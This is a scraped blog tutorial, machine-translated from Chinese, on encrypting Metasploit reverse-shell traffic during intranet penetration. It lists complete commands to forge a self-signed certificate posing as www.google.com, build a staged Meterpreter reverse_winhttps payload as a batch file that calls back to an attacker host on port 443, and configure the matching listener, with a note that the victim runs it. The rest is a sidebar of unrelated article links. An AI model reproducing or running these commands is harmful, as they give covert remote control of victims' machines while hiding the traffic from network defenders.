当前位置:网站首页>[intranet penetration] MSF rebound traffic encryption session
[intranet penetration] MSF rebound traffic encryption session
2022-07-21 20:57:00 【3SS security front】
List of articles
msf Rebound traffic encryption session
Create certificate
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj “/C=UK/ST=London/L=London/O=Development/CN=www.google.com” \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.80.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o pentestlab.bat
Two more options are required to configure the listener
set payload windows/meterpreter/reverse_winhttps
set LHOST 192.168.80.130
set LPORT 443
set HandlerSSLCert /home/sanss/www.google.com.pem
set StagerVerifySSLCert true
perform run
The victim machine performs a rebound shell
Carry out orders
Use wireshark Grab traffic
边栏推荐
- wap绿色传奇搭建(纯净版)
- Simple method of array de duplication (excluding reference type)
- 个人小程序:梦缘
- Storage principle of JS data type in memory
- 22. [static member access format] class name:: access member, then the member needs to be static]
- Uniapp determines whether the user's Bluetooth is turned on
- ecshop漏洞复现
- php 提取字符串中的手机号并验证是否为 11 位
- 【PHP代码审计】Pikachu靶场漏洞入门分析
- Derivation of Jacobian characteristic system for two-dimensional inviscid flow
猜你喜欢
[geek challenge 2019] easy, love, baby SQL
thinkphp6使用EasyWeChat5.x公众号开发(二)
【极客大挑战 2019】Easy,Love,Baby-SQL
个人小程序:梦缘
PHP three lines of code to write test interface
COMSOL heat conduction method to solve maze problem (path planning)
Nodejs reads and parses the dom of XML
Uniapp customized navigation bar buttons and button click events
DWVA[SQL-Injection]学习记录
Buuctf (WEB class)
随机推荐
[file upload bypass] - Secondary rendering
thinkphp6使用EasyWeChat5.x公众号开发(二)
TP5 docking visa free FM payment interface
攻防世界web区 难度等级:3(ics-05,MFW,easytornado)
Custom get request parameter class get post
Openfoam programming: combination of VOF method and porous media model
BUUCTF [GXYCTF2019] 禁止套娃
Uniapp determines whether the user's Bluetooth is turned on
Derivation of Jacobian characteristic system for two-dimensional inviscid flow
php 提取字符串中的手机号并验证是否为 11 位
Dwva [SQL injection] learning record
宽字节注入学习记录
tp5导入excel到数据库
PHP环境搭建(推荐宝塔面板)
【内网渗透】msf反弹流量加密会话
A label download and window location. Herf Download
Openfoam tips
PHP intercepts the contents before and after the specified string
PHP implements bidirectional linked list
Laravel5.1 下的计划任务